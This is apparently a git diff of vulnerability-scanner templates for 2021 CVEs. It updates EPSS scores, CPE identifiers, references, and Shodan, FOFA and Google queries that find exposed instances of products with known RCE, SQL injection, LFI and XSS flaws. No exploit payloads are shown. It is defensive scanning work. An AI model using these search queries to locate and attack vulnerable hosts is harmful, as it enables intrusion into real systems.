100644 --- a/http/cves/2021/CVE-2021-35587.yaml +++ b/http/cves/2021/CVE-2021-35587.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: oracle product: access_manager - shodan-query: http.title:"Oracle Access Management" - fofa-query: body="/oam/pages/css/login_page.css" + shodan-query: + - http.title:"Oracle Access Management" + - http.title:"oracle access management" + - http.html:"/oam/pages/css/login_page.css" + fofa-query: + - body="/oam/pages/css/login_page.css" + - title="oracle access management" google-query: intitle:"oracle access management" tags: cve2021,cve,oam,rce,java,unauth,oracle,kev diff --git a/http/cves/2021/CVE-2021-36450.yaml b/http/cves/2021/CVE-2021-36450.yaml index 4ad10985e7..51263829b4 100644 --- a/http/cves/2021/CVE-2021-36450.yaml +++ b/http/cves/2021/CVE-2021-36450.yaml @@ -21,14 +21,16 @@ info: cve-id: CVE-2021-36450 cwe-id: CWE-79 epss-score: 0.00229 - epss-percentile: 0.61111 + epss-percentile: 0.61052 cpe: cpe:2.3:a:verint:workforce_optimization:15.2.8.10048:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: verint product: workforce_optimization - shodan-query: title:"Verint Sign-in" + shodan-query: + - title:"Verint Sign-in" + - http.title:"verint sign-in" fofa-query: title="verint sign-in" google-query: intitle:"verint sign-in" tags: cve2021,cve,xss,verint diff --git a/http/cves/2021/CVE-2021-36580.yaml b/http/cves/2021/CVE-2021-36580.yaml index 8ffad535de..045e9f7006 100644 --- a/http/cves/2021/CVE-2021-36580.yaml +++ b/http/cves/2021/CVE-2021-36580.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: icewarp product: icewarp_server - shodan-query: title:"icewarp" + shodan-query: + - title:"icewarp" + - http.title:"icewarp" fofa-query: title="icewarp" google-query: intitle:"icewarp" tags: cve2021,cve,icewarp,redirect diff --git a/http/cves/2021/CVE-2021-37304.yaml b/http/cves/2021/CVE-2021-37304.yaml index 6e6d4c5cd7..958d9aadf4 100644 --- a/http/cves/2021/CVE-2021-37304.yaml +++ b/http/cves/2021/CVE-2021-37304.yaml @@ -26,8 +26,13 @@ info: max-request: 1 vendor: jeecg product: jeecg - shodan-query: title:"Jeecg-Boot" - fofa-query: title="JeecgBoot 企业级低代码平台" + shodan-query: + - title:"Jeecg-Boot" + - http.title:"jeecg-boot" + fofa-query: + - title="JeecgBoot 企业级低代码平台" + - title="jeecg-boot" + - title="jeecgboot 企业级低代码平台" google-query: intitle:"jeecg-boot" tags: cve2021,cve,jeecg,exposure diff --git a/http/cves/2021/CVE-2021-37305.yaml b/http/cves/2021/CVE-2021-37305.yaml index 52963f665b..8260585af9 100644 --- a/http/cves/2021/CVE-2021-37305.yaml +++ b/http/cves/2021/CVE-2021-37305.yaml @@ -26,8 +26,13 @@ info: max-request: 1 vendor: jeecg product: jeecg - shodan-query: title:"Jeecg-Boot" - fofa-query: title="JeecgBoot 企业级低代码平台" + shodan-query: + - title:"Jeecg-Boot" + - http.title:"jeecg-boot" + fofa-query: + - title="JeecgBoot 企业级低代码平台" + - title="jeecg-boot" + - title="jeecgboot 企业级低代码平台" google-query: intitle:"jeecg-boot" tags: cve2021,cve,jeecg,exposure diff --git a/http/cves/2021/CVE-2021-37416.yaml b/http/cves/2021/CVE-2021-37416.yaml index 9f17e6143b..bcc936498f 100644 --- a/http/cves/2021/CVE-2021-37416.yaml +++ b/http/cves/2021/CVE-2021-37416.yaml @@ -27,9 +27,16 @@ info: max-request: 1 vendor: zohocorp product: manageengine_adselfservice_plus - shodan-query: http.title:"ManageEngine" - fofa-query: title="manageengine" - google-query: intitle:"adselfservice plus" + shodan-query: + - http.title:"ManageEngine" + - http.title:"adselfservice plus" + - http.title:"manageengine" + fofa-query: + - title="manageengine" + - title="adselfservice plus" + google-query: + - intitle:"adselfservice plus" + - intitle:"manageengine" tags: cve2021,cve,zoho,xss,zohocorp http: diff --git a/http/cves/2021/CVE-2021-37538.yaml b/http/cves/2021/CVE-2021-37538.yaml index c9fc082981..fd7d491e89 100644 --- a/http/cves/2021/CVE-2021-37538.yaml +++ b/http/cves/2021/CVE-2021-37538.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-37538 cwe-id: CWE-89 - epss-score: 0.02819 - epss-percentile: 0.90434 + epss-score: 0.01766 + epss-percentile: 0.87981 cpe: cpe:2.3:a:smartdatasoft:smartblog:*:*:*:*:*:prestashop:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-37833.yaml b/http/cves/2021/CVE-2021-37833.yaml index bd75777b90..09cad85e3b 100644 --- a/http/cves/2021/CVE-2021-37833.yaml +++ b/http/cves/2021/CVE-2021-37833.yaml @@ -27,8 +27,12 @@ info: max-request: 4 vendor: digitaldruid product: hoteldruid - shodan-query: http.title:"hoteldruid" - fofa-query: title="hoteldruid" + shodan-query: + - http.title:"hoteldruid" + - http.favicon.hash:-1521640213 + fofa-query: + - title="hoteldruid" + - icon_hash=-1521640213 google-query: intitle:"hoteldruid" tags: cve2021,cve,hoteldruid,xss,digitaldruid diff --git a/http/cves/2021/CVE-2021-38540.yaml b/http/cves/2021/CVE-2021-38540.yaml index 9398217562..956545d288 100644 --- a/http/cves/2021/CVE-2021-38540.yaml +++ b/http/cves/2021/CVE-2021-38540.yaml @@ -27,9 +27,18 @@ info: max-request: 2 vendor: apache product: airflow - shodan-query: title:"Sign In - Airflow" - fofa-query: title="sign in - airflow" - google-query: intitle:"sign in - airflow" + shodan-query: + - title:"Sign In - Airflow" + - http.title:"airflow - dags" || http.html:"apache airflow" + - http.title:"sign in - airflow" + - product:"redis" + fofa-query: + - title="sign in - airflow" + - apache airflow + - title="airflow - dags" || http.html:"apache airflow" + google-query: + - intitle:"sign in - airflow" + - intitle:"airflow - dags" || http.html:"apache airflow" tags: cve2021,cve,apache,airflow,rce,intrusive http: diff --git a/http/cves/2021/CVE-2021-38647.yaml b/http/cves/2021/CVE-2021-38647.yaml index d4ad39cca0..b67e4fcec5 100644 --- a/http/cves/2021/CVE-2021-38647.yaml +++ b/http/cves/2021/CVE-2021-38647.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-38647 cwe-id: CWE-287 - epss-score: 0.97408 - epss-percentile: 0.99918 + epss-score: 0.97476 + epss-percentile: 0.99967 cpe: cpe:2.3:a:microsoft:azure_automation_state_configuration:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-38704.yaml b/http/cves/2021/CVE-2021-38704.yaml index 4b4fe50d76..6cef68fae9 100644 --- a/http/cves/2021/CVE-2021-38704.yaml +++ b/http/cves/2021/CVE-2021-38704.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: cliniccases product: cliniccases - shodan-query: http.title:"ClinicCases",html:"/cliniccases/" + shodan-query: + - http.title:"ClinicCases",html:"/cliniccases/" + - http.title:"cliniccases",html:"/cliniccases/" fofa-query: title="cliniccases",html:"/cliniccases/" google-query: intitle:"cliniccases",html:"/cliniccases/" tags: cve,cve2021,xss,cliniccases diff --git a/http/cves/2021/CVE-2021-38751.yaml b/http/cves/2021/CVE-2021-38751.yaml index 5bacfe740c..d346a368bb 100644 --- a/http/cves/2021/CVE-2021-38751.yaml +++ b/http/cves/2021/CVE-2021-38751.yaml @@ -13,13 +13,15 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-38751 - https://github.com/exponentcms/exponent-cms/issues/1544 - https://github.com/exponentcms/exponent-cms/blob/a9fa9358c5e8dc2ce7ad61d7d5bea38505b8515c/exponent_constants.php#L56-L64 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N cvss-score: 4.3 cve-id: CVE-2021-38751 cwe-id: CWE-116 - epss-score: 0.00242 - epss-percentile: 0.62095 + epss-score: 0.0012 + epss-percentile: 0.46178 cpe: cpe:2.3:a:exponentcms:exponentcms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39146.yaml b/http/cves/2021/CVE-2021-39146.yaml index 6430851191..3615ebc08b 100644 --- a/http/cves/2021/CVE-2021-39146.yaml +++ b/http/cves/2021/CVE-2021-39146.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-39146 cwe-id: CWE-434 epss-score: 0.27391 - epss-percentile: 0.96375 + epss-percentile: 0.96788 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39152.yaml b/http/cves/2021/CVE-2021-39152.yaml index 34ee5c6927..db9f396dd3 100644 --- a/http/cves/2021/CVE-2021-39152.yaml +++ b/http/cves/2021/CVE-2021-39152.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-39152 cwe-id: CWE-502 epss-score: 0.01242 - epss-percentile: 0.83992 + epss-percentile: 0.85465 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39211.yaml b/http/cves/2021/CVE-2021-39211.yaml index 62ac984652..6605024636 100644 --- a/http/cves/2021/CVE-2021-39211.yaml +++ b/http/cves/2021/CVE-2021-39211.yaml @@ -26,8 +26,12 @@ info: max-request: 2 vendor: glpi-project product: glpi - shodan-query: http.title:"glpi" - fofa-query: icon_hash="-1474875778" + shodan-query: + - http.title:"glpi" + - http.favicon.hash:"-1474875778" + fofa-query: + - icon_hash="-1474875778" + - title="glpi" google-query: intitle:"glpi" tags: cve,cve2021,glpi,exposure,glpi-project diff --git a/http/cves/2021/CVE-2021-39226.yaml b/http/cves/2021/CVE-2021-39226.yaml index 5286baaf02..1641a6da4d 100644 --- a/http/cves/2021/CVE-2021-39226.yaml +++ b/http/cves/2021/CVE-2021-39226.yaml @@ -26,8 +26,13 @@ info: max-request: 1 vendor: grafana product: grafana - shodan-query: title:"Grafana" - fofa-query: title="grafana" + shodan-query: + - title:"Grafana" + - cpe:"cpe:2.3:a:grafana:grafana" + - http.title:"grafana" + fofa-query: + - title="grafana" + - app="grafana" google-query: intitle:"grafana" tags: cve2021,cve,grafana,kev diff --git a/http/cves/2021/CVE-2021-39327.yaml b/http/cves/2021/CVE-2021-39327.yaml index 7fe627b3b5..815d950a97 100644 --- a/http/cves/2021/CVE-2021-39327.yaml +++ b/http/cves/2021/CVE-2021-39327.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.3 cve-id: CVE-2021-39327 cwe-id: CWE-459,CWE-200 - epss-score: 0.16259 - epss-percentile: 0.95861 + epss-score: 0.18349 + epss-percentile: 0.96191 cpe: cpe:2.3:a:ait-pro:bulletproof_security:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-39350.yaml b/http/cves/2021/CVE-2021-39350.yaml index 351539e0d1..35fab8044a 100644 --- a/http/cves/2021/CVE-2021-39350.yaml +++ b/http/cves/2021/CVE-2021-39350.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-39350 - https://plugins.trac.wordpress.org/changeset/2580834/fv-wordpress-flowplayer/trunk/view/stats.php - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39350 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-39350 cwe-id: CWE-79 - epss-score: 0.00104 - epss-percentile: 0.42206 + epss-score: 0.00106 + epss-percentile: 0.43162 cpe: cpe:2.3:a:foliovision:fv_flowplayer_video_player:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-39501.yaml b/http/cves/2021/CVE-2021-39501.yaml index 31fdb0043c..de2aed67f7 100644 --- a/http/cves/2021/CVE-2021-39501.yaml +++ b/http/cves/2021/CVE-2021-39501.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-39501 cwe-id: CWE-601 - epss-score: 0.00093 - epss-percentile: 0.38461 + epss-score: 0.00141 + epss-percentile: 0.49694 cpe: cpe:2.3:a:eyoucms:eyoucms:1.5.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-40149.yaml b/http/cves/2021/CVE-2021-40149.yaml index aee3e04b55..e151ef9c10 100644 --- a/http/cves/2021/CVE-2021-40149.yaml +++ b/http/cves/2021/CVE-2021-40149.yaml @@ -22,13 +22,13 @@ info: cve-id: CVE-2021-40149 cwe-id: CWE-552 epss-score: 0.00942 - epss-percentile: 0.82739 - cpe: cpe:2.3:o:reolink:e1_zoom_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.8308 + cpe: cpe:2.3:h:reolink:e1_zoom:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: reolink - product: e1_zoom_firmware + product: e1_zoom shodan-query: http.title:"Reolink" fofa-query: title="reolink" google-query: intitle:"reolink" diff --git a/http/cves/2021/CVE-2021-40150.yaml b/http/cves/2021/CVE-2021-40150.yaml index 0fe67cdf97..df87eb26fa 100644 --- a/http/cves/2021/CVE-2021-40150.yaml +++ b/http/cves/2021/CVE-2021-40150.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: reolink product: e1_zoom_firmware - shodan-query: http.title:"Reolink" + shodan-query: + - http.title:"Reolink" + - http.title:"reolink" fofa-query: title="reolink" google-query: intitle:"reolink" tags: cve2021,cve,reolink,camera,exposure,iot diff --git a/http/cves/2021/CVE-2021-40438.yaml b/http/cves/2021/CVE-2021-40438.yaml index c406d6e7a6..cec2d61812 100644 --- a/http/cves/2021/CVE-2021-40438.yaml +++ b/http/cves/2021/CVE-2021-40438.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: apache product: http_server - shodan-query: cpe:"cpe:2.3:a:apache:http_server" + shodan-query: + - cpe:"cpe:2.3:a:apache:http_server" + - apache 2.4.49 tags: cve2021,cve,ssrf,apache,mod-proxy,kev http: diff --git a/http/cves/2021/CVE-2021-40539.yaml b/http/cves/2021/CVE-2021-40539.yaml index 6ad3d31280..79bd64e866 100644 --- a/http/cves/2021/CVE-2021-40539.yaml +++ b/http/cves/2021/CVE-2021-40539.yaml @@ -26,9 +26,15 @@ info: max-request: 4 vendor: zohocorp product: manageengine_adselfservice_plus - shodan-query: http.title:"manageengine" - fofa-query: title="manageengine" - google-query: intitle:"adselfservice plus" + shodan-query: + - http.title:"manageengine" + - http.title:"adselfservice plus" + fofa-query: + - title="manageengine" + - title="adselfservice plus" + google-query: + - intitle:"adselfservice plus" + - intitle:"manageengine" tags: cve2021,cve,rce,ad,intrusive,manageengine,kev,zohocorp http: diff --git a/http/cves/2021/CVE-2021-40542.yaml b/http/cves/2021/CVE-2021-40542.yaml index 4a0cccf2d0..fb5a0985a9 100644 --- a/http/cves/2021/CVE-2021-40542.yaml +++ b/http/cves/2021/CVE-2021-40542.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: os4ed product: opensis - shodan-query: http.title:"openSIS" + shodan-query: + - http.title:"openSIS" + - http.title:"opensis" fofa-query: title="opensis" google-query: intitle:"opensis" tags: cve2021,cve,xss,opensis,os4ed diff --git a/http/cves/2021/CVE-2021-40651.yaml b/http/cves/2021/CVE-2021-40651.yaml index cff6b6172a..4cfb2912e3 100644 --- a/http/cves/2021/CVE-2021-40651.yaml +++ b/http/cves/2021/CVE-2021-40651.yaml @@ -24,7 +24,9 @@ info: max-request: 2 vendor: os4ed product: opensis - shodan-query: "title:\"openSIS\"" + shodan-query: + - "title:\"openSIS\"" + - http.title:"opensis" fofa-query: title="opensis" google-query: intitle:"opensis" tags: cve,cve2021,lfi,os4ed,opensis,authenticated diff --git a/http/cves/2021/CVE-2021-40661.yaml b/http/cves/2021/CVE-2021-40661.yaml index c1fffcff14..ddd7e1a67f 100644 --- a/http/cves/2021/CVE-2021-40661.yaml +++ b/http/cves/2021/CVE-2021-40661.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: mt product: ind780_firmware - shodan-query: IND780 + shodan-query: + - IND780 + - ind780 google-query: inurl:excalweb.dll tags: cve2021,cve,ind780,lfi,mt diff --git a/http/cves/2021/CVE-2021-40822.yaml b/http/cves/2021/CVE-2021-40822.yaml index 7ce8ebe2e6..ab76590728 100644 --- a/http/cves/2021/CVE-2021-40822.yaml +++ b/http/cves/2021/CVE-2021-40822.yaml @@ -20,16 +20,21 @@ info: cvss-score: 7.5 cve-id: CVE-2021-40822 cwe-id: CWE-918 - epss-score: 0.68366 - epss-percentile: 0.97892 + epss-score: 0.79068 + epss-percentile: 0.98269 cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: osgeo product: geoserver - shodan-query: title:"GeoServer" - fofa-query: app="GeoServer" + shodan-query: + - title:"GeoServer" + - http.title:"geoserver" + fofa-query: + - app="GeoServer" + - app="geoserver" + - title="geoserver" google-query: intitle:"geoserver" tags: cve2021,cve,ssrf,geoserver,osgeo diff --git a/http/cves/2021/CVE-2021-40875.yaml b/http/cves/2021/CVE-2021-40875.yaml index 2fd3636a6b..5ac9ff8970 100644 --- a/http/cves/2021/CVE-2021-40875.yaml +++ b/http/cves/2021/CVE-2021-40875.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: gurock product: testrail - shodan-query: http.html:"TestRail" + shodan-query: + - http.html:"TestRail" + - http.html:"testrail" fofa-query: body="testrail" tags: cve2021,cve,exposure,gurock,testrail diff --git a/http/cves/2021/CVE-2021-40968.yaml b/http/cves/2021/CVE-2021-40968.yaml index e72f35da1f..0076e05d1f 100644 --- a/http/cves/2021/CVE-2021-40968.yaml +++ b/http/cves/2021/CVE-2021-40968.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: spotweb_project product: spotweb - shodan-query: title:"SpotWeb - overview" + shodan-query: + - title:"SpotWeb - overview" + - http.title:"spotweb - overview" fofa-query: title="spotweb - overview" google-query: intitle:"spotweb - overview" tags: cve2021,cve,xss,spotweb,spotweb_project diff --git a/http/cves/2021/CVE-2021-40969.yaml b/http/cves/2021/CVE-2021-40969.yaml index f6b66bcae2..a809f32ab4 100644 --- a/http/cves/2021/CVE-2021-40969.yaml +++ b/http/cves/2021/CVE-2021-40969.yaml @@ -19,15 +19,17 @@ info: cvss-score: 6.1 cve-id: CVE-2021-40969 cwe-id: CWE-79 - epss-score: 0.00152 - epss-percentile: 0.51305 + epss-score: 0.00159 + epss-percentile: 0.5237 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: spotweb_project product: spotweb - shodan-query: title:"SpotWeb - overview" + shodan-query: + - title:"SpotWeb - overview" + - http.title:"spotweb - overview" fofa-query: title="spotweb - overview" google-query: intitle:"spotweb - overview" tags: cve2021,cve,xss,spotweb,spotweb_project diff --git a/http/cves/2021/CVE-2021-40970.yaml b/http/cves/2021/CVE-2021-40970.yaml index 7c6b121592..af01b0987a 100644 --- a/http/cves/2021/CVE-2021-40970.yaml +++ b/http/cves/2021/CVE-2021-40970.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: spotweb_project product: spotweb - shodan-query: title:"SpotWeb - overview" + shodan-query: + - title:"SpotWeb - overview" + - http.title:"spotweb - overview" fofa-query: title="spotweb - overview" google-query: intitle:"spotweb - overview" tags: cve2021,cve,xss,spotweb,spotweb_project diff --git a/http/cves/2021/CVE-2021-40971.yaml b/http/cves/2021/CVE-2021-40971.yaml index 40fdece004..a4abd97109 100644 --- a/http/cves/2021/CVE-2021-40971.yaml +++ b/http/cves/2021/CVE-2021-40971.yaml @@ -19,15 +19,17 @@ info: cvss-score: 6.1 cve-id: CVE-2021-40971 cwe-id: CWE-79 - epss-score: 0.00152 - epss-percentile: 0.50482 + epss-score: 0.00159 + epss-percentile: 0.5237 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: spotweb_project product: spotweb - shodan-query: title:"SpotWeb - overview" + shodan-query: + - title:"SpotWeb - overview" + - http.title:"spotweb - overview" fofa-query: title="spotweb - overview" google-query: intitle:"spotweb - overview" tags: cve2021,cve,xss,spotweb,spotweb_project diff --git a/http/cves/2021/CVE-2021-40972.yaml b/http/cves/2021/CVE-2021-40972.yaml index 537c65b870..4749ad9896 100644 --- a/http/cves/2021/CVE-2021-40972.yaml +++ b/http/cves/2021/CVE-2021-40972.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: spotweb_project product: spotweb - shodan-query: title:"SpotWeb - overview" + shodan-query: + - title:"SpotWeb - overview" + - http.title:"spotweb - overview" fofa-query: title="spotweb - overview" google-query: intitle:"spotweb - overview" tags: cve,cve2021,xss,spotweb,spotweb_project diff --git a/http/cves/2021/CVE-2021-40973.yaml b/http/cves/2021/CVE-2021-40973.yaml index 1e73d70438..45126028dc 100644 --- a/http/cves/2021/CVE-2021-40973.yaml +++ b/http/cves/2021/CVE-2021-40973.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: spotweb_project product: spotweb - shodan-query: title:"SpotWeb - overview" + shodan-query: + - title:"SpotWeb - overview" + - http.title:"spotweb - overview" fofa-query: title="spotweb - overview" google-query: intitle:"spotweb - overview" tags: cve2021,cve,xss,spotweb,spotweb_project diff --git a/http/cves/2021/CVE-2021-41174.yaml b/http/cves/2021/CVE-2021-41174.yaml index ca11695bcc..4f350b3038 100644 --- a/http/cves/2021/CVE-2021-41174.yaml +++ b/http/cves/2021/CVE-2021-41174.yaml @@ -26,8 +26,13 @@ info: max-request: 1 vendor: grafana product: grafana - shodan-query: title:"Grafana" - fofa-query: title="grafana" + shodan-query: + - title:"Grafana" + - cpe:"cpe:2.3:a:grafana:grafana" + - http.title:"grafana" + fofa-query: + - title="grafana" + - app="grafana" google-query: intitle:"grafana" tags: cve2021,cve,grafana,xss diff --git a/http/cves/2021/CVE-2021-41277.yaml b/http/cves/2021/CVE-2021-41277.yaml index 27f7ab7a39..c71da1bc06 100644 --- a/http/cves/2021/CVE-2021-41277.yaml +++ b/http/cves/2021/CVE-2021-41277.yaml @@ -25,12 +25,17 @@ info: epss-percentile: 0.99393 cpe: cpe:2.3:a:metabase:metabase:0.40.0:-:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: metabase product: metabase - shodan-query: http.title:"Metabase" - fofa-query: app="Metabase" - google-query: intitle:"metabase" + shodan-query: + - "http.title:\"Metabase\"" + - http.title:"metabase" + fofa-query: + - "app=\"Metabase\"" + - title="metabase" + - app="metabase" + google-query: "intitle:\"metabase\"" tags: cve2021,cve,metabase,lfi http: diff --git a/http/cves/2021/CVE-2021-41282.yaml b/http/cves/2021/CVE-2021-41282.yaml index 42300b598c..56b07326f3 100644 --- a/http/cves/2021/CVE-2021-41282.yaml +++ b/http/cves/2021/CVE-2021-41282.yaml @@ -21,16 +21,16 @@ info: cvss-score: 8.8 cve-id: CVE-2021-41282 cwe-id: CWE-74 - epss-score: 0.97305 - epss-percentile: 0.9986 + epss-score: 0.97112 + epss-percentile: 0.99788 cpe: cpe:2.3:a:pfsense:pfsense:2.5.2:*:*:*:*:*:*:* metadata: max-request: 4 vendor: pfsense product: pfsense - google-query: intitle:"pfsense - login" shodan-query: http.title:"pfsense - login" fofa-query: title="pfsense - login" + google-query: intitle:"pfsense - login" tags: cve2021,cve,pfsense,rce,authenticated http: diff --git a/http/cves/2021/CVE-2021-41349.yaml b/http/cves/2021/CVE-2021-41349.yaml index 7dd93bf32b..2b5776dc3e 100644 --- a/http/cves/2021/CVE-2021-41349.yaml +++ b/http/cves/2021/CVE-2021-41349.yaml @@ -26,8 +26,14 @@ info: max-request: 1 vendor: microsoft product: exchange_server - shodan-query: vuln:cve-2021-26855 - fofa-query: title="outlook" + shodan-query: + - vuln:cve-2021-26855 + - http.favicon.hash:1768726119 + - http.title:"outlook" + - cpe:"cpe:2.3:a:microsoft:exchange_server" + fofa-query: + - title="outlook" + - icon_hash=1768726119 google-query: intitle:"outlook" tags: cve,cve2021,xss,microsoft,exchange diff --git a/http/cves/2021/CVE-2021-41381.yaml b/http/cves/2021/CVE-2021-41381.yaml index afb1ce8685..64f75b1bfb 100644 --- a/http/cves/2021/CVE-2021-41381.yaml +++ b/http/cves/2021/CVE-2021-41381.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-41381 - https://www.payara.fish - http://packetstormsecurity.com/files/164365/Payara-Micro-Community-5.2021.6-Directory-Traversal.html + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-41381 cwe-id: CWE-22 - epss-score: 0.10127 - epss-percentile: 0.94375 + epss-score: 0.11037 + epss-percentile: 0.95128 cpe: cpe:2.3:a:payara:micro_community:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41432.yaml b/http/cves/2021/CVE-2021-41432.yaml index fc20ecc3ea..3e3db96c0c 100644 --- a/http/cves/2021/CVE-2021-41432.yaml +++ b/http/cves/2021/CVE-2021-41432.yaml @@ -29,8 +29,13 @@ info: max-request: 4 vendor: flatpress product: flatpress - shodan-query: http.html:"Flatpress" - fofa-query: body="flatpress" + shodan-query: + - http.html:"Flatpress" + - http.html:"flatpress" + - http.favicon.hash:-1189292869 + fofa-query: + - body="flatpress" + - icon_hash=-1189292869 tags: cve2021,cve,flatpress,xss,authenticated,oss,intrusive http: diff --git a/http/cves/2021/CVE-2021-41460.yaml b/http/cves/2021/CVE-2021-41460.yaml index 2966c0c9f2..fd507d8ad7 100644 --- a/http/cves/2021/CVE-2021-41460.yaml +++ b/http/cves/2021/CVE-2021-41460.yaml @@ -26,7 +26,9 @@ info: max-request: 1 vendor: shopex product: ecshop - fofa-query: product="ECShop" + fofa-query: + - product="ECShop" + - product="ecshop" tags: cve2021,cve,cnvd,cnvd2020,ecshop,sqli,shopex variables: num: "999999999" diff --git a/http/cves/2021/CVE-2021-41648.yaml b/http/cves/2021/CVE-2021-41648.yaml index ee2b469f76..8c60af6a4d 100644 --- a/http/cves/2021/CVE-2021-41648.yaml +++ b/http/cves/2021/CVE-2021-41648.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-41648 cwe-id: CWE-89 - epss-score: 0.06237 - epss-percentile: 0.93438 + epss-score: 0.05423 + epss-percentile: 0.93138 cpe: cpe:2.3:a:online-shopping-system-advanced_project:online-shopping-system-advanced:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41653.yaml b/http/cves/2021/CVE-2021-41653.yaml index a0d58a7082..9bf731b36f 100644 --- a/http/cves/2021/CVE-2021-41653.yaml +++ b/http/cves/2021/CVE-2021-41653.yaml @@ -13,13 +13,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-41653 - https://www.tp-link.com/us/press/security-advisory/ - http://tp-link.com + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-41653 cwe-id: CWE-94 - epss-score: 0.95374 - epss-percentile: 0.99205 + epss-score: 0.95198 + epss-percentile: 0.99332 cpe: cpe:2.3:o:tp-link:tl-wr840n_firmware:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-41749.yaml b/http/cves/2021/CVE-2021-41749.yaml index f742c3c15d..75e515e396 100644 --- a/http/cves/2021/CVE-2021-41749.yaml +++ b/http/cves/2021/CVE-2021-41749.yaml @@ -24,7 +24,10 @@ info: vendor: nystudio107 product: seomatic framework: craft_cms - shodan-query: 'X-Powered-By: Craft CMS html:"SEOmatic"' + shodan-query: + - 'X-Powered-By: Craft CMS html:"SEOmatic"' + - "x-powered-by: craft cms" + - 'x-powered-by: craft cms html:"seomatic"' tags: cve2021,cve,craftcms,cms,ssti,nystudio107,craft_cms variables: num1: "{{rand_int(40000, 44800)}}" diff --git a/http/cves/2021/CVE-2021-41773.yaml b/http/cves/2021/CVE-2021-41773.yaml index a13df2fc63..aa55a5d779 100644 --- a/http/cves/2021/CVE-2021-41773.yaml +++ b/http/cves/2021/CVE-2021-41773.yaml @@ -30,7 +30,10 @@ info: max-request: 3 vendor: apache product: http_server - shodan-query: Apache 2.4.49 + shodan-query: + - Apache 2.4.49 + - cpe:"cpe:2.3:a:apache:http_server" + - apache 2.4.49 tags: cve2021,cve,lfi,rce,apache,misconfig,traversal,kev variables: cmd: "echo COP-37714-1202-EVC | rev" diff --git a/http/cves/2021/CVE-2021-4191.yaml b/http/cves/2021/CVE-2021-4191.yaml index 8b3946e122..27f89c773e 100644 --- a/http/cves/2021/CVE-2021-4191.yaml +++ b/http/cves/2021/CVE-2021-4191.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: gitlab product: gitlab - shodan-query: cpe:"cpe:2.3:a:gitlab:gitlab" + shodan-query: + - cpe:"cpe:2.3:a:gitlab:gitlab" + - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" tags: cve2021,cve,gitlab,api,graphql,enum,unauth diff --git a/http/cves/2021/CVE-2021-42013.yaml b/http/cves/2021/CVE-2021-42013.yaml index 057cc91cb2..e1675826d2 100644 --- a/http/cves/2021/CVE-2021-42013.yaml +++ b/http/cves/2021/CVE-2021-42013.yaml @@ -20,15 +20,17 @@ info: cvss-score: 9.8 cve-id: "CVE-2021-42013" 